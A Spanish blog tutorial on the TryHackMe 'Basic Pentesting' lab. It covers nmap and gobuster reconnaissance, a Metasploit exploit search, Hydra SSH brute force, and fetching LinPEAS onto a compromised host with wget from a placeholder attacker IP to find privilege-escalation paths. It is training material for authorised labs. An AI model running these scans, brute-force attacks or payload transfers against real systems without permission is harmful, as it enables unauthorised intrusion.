Guía Definitiva: Pentesting Básico Paso a Paso en TryHackMe

La luz parpadeante del monitor era la única compañía mientras los logs del servidor escupían una anomalía. Una que no debería estar ahí. Hay fantasmas en la máquina, susurros de datos corruptos. Hoy no vamos a parchear un sistema; vamos a realizar una autopsia digital. La deuda técnica siempre se paga. A veces con tiempo, a veces con un data breach a medianoche. Analicemos tu ataque, o mejor dicho, el ataque que estás a punto de ejecutar. Hemos puesto la mira en TryHackMe, una arena donde los gladiadores digitales se forjan. El desafío: "BASIC PENTESTING". ¿Estás listo para la primera lección?

Análisis Inicial: El Campo de Batalla Digital

En el universo de la ciberseguridad ofensiva, cada máquina es un fortín esperando ser asaltado. TryHackMe, con su enfoque gamificado, se ha convertido en un campo de entrenamiento de élite. El desafío "BASIC PENTESTING" no es un juego para novatos con suerte; es una simulación cruda de los primeros pasos en cualquier operación de pentesting real. Aquí, la estrategia no es adornada, es pragmática. El objetivo es simple: obtener acceso. Pero el camino hacia la victoria es una intrincada danza de reconocimiento, explotación y, si tienes suerte (o eres bueno), escalada de privilegios.

Olvídate de los guiones mágicos que prometen la luna. La base de todo pentest sólido reside en la metodología. Entender la estructura de ataque, desde la huella digital inicial hasta la toma de control, es crucial. La Cyber Kill Chain, aunque un modelo de defensa, nos da una perspectiva valiosa sobre las fases que un atacante sigue. Para este desafío, desglosaremos esas fases en acciones concretas:

  • Reconocimiento: Descubrir la superficie de ataque. ¿Qué se expone? ¿Qué servicios corren?
  • Explotación: Usar una debilidad para entrar. Un puerto abierto, una versión vulnerable de un servicio.
  • Escalada de Privilegios: Una vez dentro con privilegios bajos, buscar cómo ascender para obtener un control más profundo.
  • Objetivos: La meta final, como obtener las famosas flags (banderas) que validan tu éxito en la simulación.

Este es el esqueleto del operativo. Cada fase puede ser un pozo sin fondo de complejidad, pero para "BASIC PENTESTING", nos centraremos en las herramientas y técnicas fundamentales que todo operador debe dominar.

Arquitectura del Ataque: Más Allá de los Comandos

La belleza de un pentest bien ejecutado radica en su planificación. Cada herramienta, cada comando, tiene un propósito. No se trata solo de ejecutar nmap -sV -sC -oN scan.txt 10.10.x.x y esperar un milagro. Se trata de entender qué hace cada flag, qué información buscamos activamente y cómo esa información se correlaciona con las tácticas, técnicas y procedimientos (TTPs) de un adversario real.

"La información es poder, pero la información mal utilizada es un peligro. Asegúrate de que tu reconocimiento sea metódico, no caótico."

En este desafío, la arquitectura del ataque se reduce a un flujo lógico:

  1. Descubrimiento de Red: Mapear la red objetivo para identificar hosts activos y puertos abiertos. Aquí, nmap es tu navaja suiza.
  2. Enumeración de Servicios: Una vez identificados los servicios en los puertos abiertos (HTTP, SMB, SSH, etc.), debemos sondearlos para entender su versión y posibles debilidades.
  3. Identificación de Vulnerabilidades: Cruzar la información de servicios y versiones con bases de datos de exploits conocidos (ExploitDB, Metasploit DB) o buscando configuraciones erróneas comunes.
  4. Acceso Inicial: Utilizar una vulnerabilidad o un método de fuerza bruta para obtener credenciales o ejecutar código remoto.
  5. Escalada de Privilegios: Buscar información sensible en el sistema comprometido (archivos de configuración, credenciales hardcodeadas, binarios con SUID) o exploits locales para ganar permisos de administrador (root/SYSTEM).

Cada paso debe ser documentado. Las notas son tu salvavidas. Herramientas como Obsidian o Joplin son tus aliados para mantener un registro ordenado. No confíes en la memoria en el fragor de la batalla digital.

Arsenal del Operador/Analista

Para enfrentarte a desafíos como "BASIC PENTESTING" y prosperar en el mundo del pentesting, necesitas las herramientas adecuadas. No te dejes engañar por las versiones gratuitas si buscas eficiencia profesional y capacidad para análisis a gran escala. Para un trabajo serio, la inversión en herramientas de pago es a menudo indispensable. Considera esto no como un gasto, sino como una inversión en tu capacidad de facturar. Plataformas como TryHackMe te permiten practicar con estas herramientas en un entorno seguro y legal.

  • Escaneo y Enumeración:
    • Nmap: El rey indiscutible para el descubrimiento de red y la enumeración de puertos y servicios. Su poder es inmenso, y su flexibilidad, legendaria. Para tareas avanzadas, considera Nmap Scripting Engine (NSE).
    • Gobuster: Indispensable para la fuerza bruta de directorios y subdominios en servidores web. Rápido y efectivo.
    • Enum4Linux: Una utilidad fantástica para la enumeración de información de sistemas Windows y Samba vía SMB.
  • Explotación y Post-Explotación:
    • Metasploit Framework: Una suite completa de herramientas de explotación, payloads y módulos de post-explotación. Es el estándar de la industria para muchos.
    • Hydra: Un atacante de contraseñas en línea muy rápido y flexible, capaz de atacar docenas de protocolos. Ideal para fuerza bruta de credenciales.
    • LinPEAS (Linux Privilege Escalation Awesome Script): Un script espectacularmente útil para automatizar la búsqueda de vectores de escalada de privilegios en sistemas Linux. La versión para Windows, WinPEAS, es igualmente vital.
  • Bases de Conocimiento y Referencia:
    • Exploit-DB: El archivo más grande de exploits públicos y pruebas de concepto.
    • HackTricks: Un repositorio masivo de información sobre pentesting, ciberseguridad, y técnicas de post-explotación. Es un recurso inestimable que deberías tener siempre a mano.
    • Documentación Oficial: Un pentester debe saber consultar la documentación oficial de las herramientas y protocolos que utiliza.
  • Gestión de Notas:
    • Obsidian: Para mantener una base de conocimiento personal interconectada.
    • Joplin: Una alternativa sólida y de código abierto para notas y listas de tareas.
  • Certificaciones: Para validar tus habilidades y destacar en el mercado, considera certificaciones como OSCP de Offensive Security o las de CompTIA Security+. Son el siguiente nivel para demostrar competencia real ante empleadores o clientes.

"Claro, puedes usar la versión gratuita de Nmap, pero para un análisis de red a escala empresarial que requiera la detección de servicios ofuscados y vulnerabilidades específicas, las suscripciones a escáneres comerciales como Nessus o Qualys son el camino a seguir. No se trata de ser purista, se trata de ser efectivo y eficiente."

Taller Práctico: Reconocimiento con Nmap y Gobuster

La fase de reconocimiento es fundamental. Sin un mapeo preciso, estás disparando a ciegas. Aquí, convertiremos tu terminal en un ojo escrutador.

Paso 1: Descubrimiento de Hosts con Nmap

Primero, necesitamos encontrar la IP de la máquina objetivo dentro del laboratorio de TryHackMe. Asumamos que es `10.10.10.100`.


# Escaneo básico para encontrar hosts activos en la red privada
nmap -sn 10.10.10.0/24 -oN hosts_scan.txt

Este comando realizará un ping scan para identificar hosts que respondan en el rango especificado. Guárdalo en un archivo para referencia.

Paso 2: Enumeración de Puertos y Servicios con Nmap

Una vez que tengas la IP, es hora de sondear los puertos abiertos y los servicios que corren en ellos.


# Escaneo de puertos, detección de servicios y versiones, y ejecución de scripts Nmap predeterminados
nmap -sV -sC -oN full_scan_10.10.10.100.txt 10.10.10.100

-sV intenta determinar la versión del servicio. -sC ejecuta los scripts Nmap predeterminados, útiles para recopilar más información. -oN guarda la salida en formato normal.

Analiza la salida. Busca puertos comunes como 80 (HTTP), 443 (HTTPS), 22 (SSH), 21 (FTP), 139/445 (SMB) y 3389 (RDP). Si encuentras un servidor web (puerto 80 o 443), este es un excelente candidato para una enumeración más profunda.

Paso 3: Enumeración de Directorios Web con Gobuster

Si Nmap mostró un puerto HTTP/HTTPS abierto, usa Gobuster para encontrar directorios y archivos ocultos.


# Fuerza bruta de directorios en el servidor web
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -o gobuster_dirs.txt

-u especifica la URL objetivo. -w la lista de palabras a usar (una lista mediana suele ser un buen punto de partida). -x las extensiones de archivo a buscar. -o guarda la salida.

Busca directorios como `/admin`, `/login`, `/backup`, o cualquier cosa que parezca interesante. Si encuentras un login, podrías considerar usar Hydra más tarde, pero primero, ¿hay alguna otra vía?

"El reconocimiento no termina con Nmap. Cada respuesta del servidor, cada línea de código fuente, es una pista en el laberinto."

Fase de Explotación: El Primer Pie Dentro

Has realizado tu reconocimiento y has encontrado un potencial punto de entrada. Ahora es el momento de la explotación. Para "BASIC PENTESTING", esto a menudo implica explotar una vulnerabilidad conocida en un servicio expuesto o descifrar credenciales.

Si encontraste una versión de un servicio vulnerable (por ejemplo, un servidor web con una versión antigua de Apache o una base de datos con credenciales por defecto), tu siguiente paso es buscar exploits públicos.

Navega a Exploit-DB o a la base de datos de Metasploit y busca exploits para la versión del servicio que identificaste. Por ejemplo, si encontraste una versión vulnerable de un servidor web, podrías usar un exploit de Metasploit:


# Iniciar Metasploit Console
msfconsole

# Buscar un exploit para, digamos, Apache Struts
search type:exploit platform:linux struts

Una vez que encuentres un exploit que coincida, lo usarás para obtener una shell en la máquina objetivo. La complejidad varía; algunos exploits te dan acceso directo (meterpreter), otros requieren un poco más de manipulación.

Alternativamente, si encontraste una página de login y sospechas que las credenciales son débiles o por defecto, una herramienta como Hydra puede ser tu mejor opción. Por ejemplo, para un login SSH:


# Usar Hydra para fuerza bruta de credenciales SSH (requiere una lista de usuarios y contraseñas)
hydra -L users.txt -P passwords.txt ssh://10.10.10.100

Si esto tiene éxito, tendrás un par de credenciales válidas para acceder vía SSH.

El éxito en esta fase se mide por la obtención de un acceso inicial, ya sea una shell de no privilegiada o, con suerte, un acceso más privilegiado.

Subiendo la Escalera: Escalada de Privilegios

Has entrado. Felicidades. Pero un acceso de usuario normal rara vez es el objetivo final. La verdadera batalla comienza ahora: la escalada de privilegios. El objetivo es pasar de ser un usuario común a ser root en Linux o SYSTEM en Windows.

Una vez que tengas una shell, el siguiente paso es la enumeración interna. Ejecuta scripts como LinPEAS (en Linux) o WinPEAS (en Windows) para automatizar la búsqueda de debilidades:


# Transferir LinPEAS a la máquina comprometida (ej: usando Python HTTP server)
# En tu máquina atacante: python3 -m http.server 8000
# En la máquina comprometida: wget http://TU_IP_ATACANTE:8000/linpeas.sh
# Hacer ejecutable el script
chmod +x linpeas.sh
# Ejecutar y buscar posibles escaladas
./linpeas.sh > linpeas_results.txt

Analiza la salida de LinPEAS. Busca:

  • Servicios mal configurados.
  • Permisos de escritura en directorios clave.
  • Binarios con SUID o SGID mal configurados.
  • Tareas programadas (cron jobs) que se ejecutan con privilegios elevados y que podrías manipular.
  • Versiones de kernel o software con exploits conocidos que podrías haber pasado por alto.
  • Credenciales hardcodeadas en scripts o archivos de configuración.

A veces, puedes encontrar una vulnerabilidad local en el kernel o en un binario del sistema. Exploit-DB y `searchsploit` son tus herramientas para esto. Busca exploits que coincidan con la versión del sistema operativo y el kernel.

Para un pentester, la escalada de privilegios es una demostración de tenacidad y conocimiento profundo del sistema operativo. Es lo que separa a un actor de intrusiones de un operador de élite.

Conclusiones Oscuras: El Sabor de la Victoria (o la Derrota)

El desafío "BASIC PENTESTING" en TryHackMe es una lección de humildad y una demostración práctica de los fundamentos. La estrategia del hacker, en su esencia, no es magia negra, sino una metodología rigurosa aplicada con las herramientas correctas. Desde el primer escaneo hasta la toma de control final, cada paso cuenta.

Has aprendido a:

  • Mapear la superficie de ataque con Nmap.
  • Descubrir recursos ocultos en servidores web con Gobuster.
  • Explotar vulnerabilidades conocidas o debilidades de autenticación.
  • Enumerar y explotar debilidades internas para escalar privilegios.

Si te has quedado atascado, no te culpes. El pentesting es un arte que requiere práctica constante. Las herramientas como HackTricks y las bases de datos de exploits son tus biblia. La clave está en la persistencia, la curiosidad y la voluntad de desmantelar sistemas para entender cómo funcionan... y cómo romperlos de forma ética.

Para moverte al siguiente nivel, considera explorar desafíos más complejos o cursos que profundicen en técnicas específicas. La industria de la ciberseguridad está en constante evolución, y tu conjunto de habilidades debe hacerlo también. Si quieres dominar la explotación web avanzada, la ingeniería social o el análisis forense digital, la formación continua es la única vía.

Preguntas Frecuentes

¿Qué debo hacer si Nmap no encuentra nada interesante?

Revisa tu rango de IP, asegúrate de que la VPN esté conectada correctamente si es necesario para la red del laboratorio, y prueba diferentes tipos de escaneo si los primeros no dan resultados. A veces, las máquinas pueden estar protegidas contra pings básicos.

¿Es ético usar herramientas como Hydra o Metasploit?

Sí, siempre y cuando las uses en entornos autorizados y con fines educativos o de seguridad, como en plataformas de CTF (Capture The Flag) o en tus propios laboratorios. El uso en sistemas no autorizados es ilegal y malintencionado.

¿Cuál es el siguiente paso después de obtener una shell de bajo privilegio?

La escalada de privilegios. Esto implica enumerar el sistema interno para encontrar puntos débiles, como versiones de software vulnerables, permisos incorrectos o credenciales expuestas.

¿Es suficiente solo conocer las herramientas o también la metodología?

La metodología es crucial. Las herramientas son solo medios para un fin. Entender el "por qué" y el "cómo" de cada fase de un pentest te hace un operador más eficaz y adaptable que alguien que solo conoce un comando.

¿Cómo puedo practicar la escalada de privilegios de forma legal y segura?

Plataformas como TryHackMe, Hack The Box, VulnHub y OverTheWire ofrecen máquinas y desafíos diseñados específicamente para practicar pentesting y escalada de privilegios en entornos controlados y seguros.

El Contrato: Tu Primer Ataque con Credenciales de Bajo Privilegio

Ahora es tu turno. Toma este conocimiento y aplícalo. El escenario es el siguiente: Has completado el desafío "BASIC PENTESTING" y tienes una shell como un usuario poco privilegiado en la máquina objetivo. Tu contrato es encontrar un archivo de texto plano que contenga las credenciales de administrador (un nombre de usuario y una contraseña) en el directorio home del usuario comprometido, o en un archivo de configuración de un servicio web que hayas descubierto. Describe en los comentarios de este post las herramientas y los comandos exactos que utilizarías para buscar y extraer esta información sensible. Demuestra tu método, tus hallazgos (hipotéticos) y cómo validarías que esas credenciales te otorgan acceso de administrador.

No comments:

Post a Comment